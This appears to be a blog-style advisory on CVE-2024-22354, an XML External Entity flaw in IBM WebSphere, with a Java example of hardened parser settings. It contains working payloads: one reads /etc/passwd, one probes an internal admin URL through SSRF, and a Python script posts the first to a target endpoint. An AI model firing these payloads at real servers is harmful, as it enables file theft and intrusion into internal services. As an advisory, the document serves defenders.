CVE-2024-22354 is a newly discovered security vulnerability affecting IBM WebSphere Application Server versions 8.5 and 9.0, and WebSphere Liberty distributions from 17.0.0.3 up through 24.0.0.5. The issue is a classic XML External Entity (XXE) Injection flaw that can be remotely exploited. Attackers can abuse this to steal sensitive information, conduct server-side request forgery (SSRF), or consume resources on the server.
This article dives deep into CVE-2024-22354 with a simple explanation, reference links, code snippets, and a straightforward proof-of-concept (PoC) to illustrate the risk.
What is XML External Entity (XXE) Injection?
XXE is a security flaw that arises when an application processes XML input insecurely, allowing attackers to reference local or remote resources via special XML constructs called "entities." When vulnerable, applications may:
- Leak server files (like /etc/passwd)
Affected Versions
- WebSphere Application Server 8.5 and 9.0
- WebSphere Liberty 17.0.0.3 through 24.0.0.5
Up-to-date advisory information can be found in IBM’s official security bulletin:
IBM Security Bulletin: XXE vulnerability in WebSphere Application Server (CVE-2024-22354)
Technical Details
When these IBM WebSphere instances process user-supplied XML, they do not sufficiently restrict the resolution of external entities. This allows an attacker to submit specially crafted XML that makes the server read local files or connect to arbitrary internal or external resources.
Example Malicious XML Payload
Suppose your WebSphere instance exposes a web service or endpoint that accepts XML payloads (for example, SOAP, REST using XML, upload functionality, or even SAML). An attacker can send the following:
<?xml version="1.0" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<user>
<name>&xxe;</name>
</user>
If the server is vulnerable, it will process the external entity, substitute &xxe; with the file content, and leak /etc/passwd in its processing result or logs.
Suppose there’s a WebSphere-based REST or SOAP endpoint at:
POST http://target.ibm:9080/insecureApp/xmlParser
Content-Type: application/xml
Exploit code using Python
import requests

# The same file-disclosure payload shown above.
xml_payload = '''<?xml version="1.0" ?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<user>
<name>&xxe;</name>
</user>
'''

# Send the raw XML body to the hypothetical endpoint.
r = requests.post(
    "http://target.ibm:9080/insecureApp/xmlParser",
    data=xml_payload.encode("utf-8"),
    headers={"Content-Type": "application/xml"},
    timeout=10,
)
print(r.status_code)
print(r.text)
If the server is vulnerable, you’ll see /etc/passwd dumped in the response or error.
To demonstrate SSRF, you can try:
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://127.0.0.1:8080/admin"> ]>
<user>
<name>&xxe;</name>
</user>
If the application fetches content from the target URL, you may find sensitive internal access or secrets.
What Should You Do?
- Patch Immediately: IBM released fixes for all supported versions. Official Patch Info
- Disable DTD/Entity Parsing: Verify that every XML parser your application uses has DTD processing and external entity resolution disabled.
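The following is an added illustration (not code from IBM or from the original article) of what "disable entity resolution" looks like for a JAXP DOM parser in a WebSphere-hosted Java application. It feeds the file-disclosure payload from above into a hardened DocumentBuilderFactory and shows that the DOCTYPE is rejected before any entity can be resolved. The class name, the helper methods and the use of Xerces feature URIs (which IBM's JAXP implementation also understands) are assumptions; SAX and StAX parsers need the equivalent settings on their own factories.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class HardenedXmlParser {

    // The file-disclosure payload from the article, embedded as a constructed test input.
    static final String XXE_PAYLOAD =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]>\n"
      + "<user><name>&xxe;</name></user>";

    /** Builds a DocumentBuilderFactory with DTD processing and external resolution turned off. */
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Primary defence: reject any document that carries a DOCTYPE at all.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for deployments that must accept a DOCTYPE somewhere:
        // never fetch external general/parameter entities or external DTDs.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    /** Returns true when the hardened parser refuses the document. */
    static boolean rejects(String xml) throws Exception {
        DocumentBuilder db = hardenedFactory().newDocumentBuilder();
        try {
            db.parse(new InputSource(new StringReader(xml)));
            return false; // parsed normally: no DOCTYPE was present
        } catch (SAXParseException e) {
            return true;  // Xerces reports that the DOCTYPE is disallowed
        }
    }

    public static void main(String[] args) throws Exception {
        System.out.println("XXE payload rejected:    " + rejects(XXE_PAYLOAD));
        System.out.println("Plain document rejected: " + rejects("<user><name>alice</name></user>"));
    }
}
```

Run it with any JDK 7u40 or later; the first line prints true and the second false, confirming that ordinary documents still parse while anything carrying a DOCTYPE is refused up front.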
References
- IBM X-Force ID: 280401
- IBM Security Bulletin - CVE-2024-22354
- OWASP XXE Cheat Sheet
Conclusion
CVE-2024-22354 serves as a sharp reminder of the dangers of insecure XML processing. If your systems use IBM WebSphere Application Server or WebSphere Liberty and handle XML, patch now. Always validate external data, keep your server updated, and monitor for unusual XML activity. This vulnerability is easy to exploit but has devastating consequences if left unchecked.
Timeline
Published on: 04/17/2024 01:15:06 UTC
Last modified on: 06/28/2024 20:07:50 UTC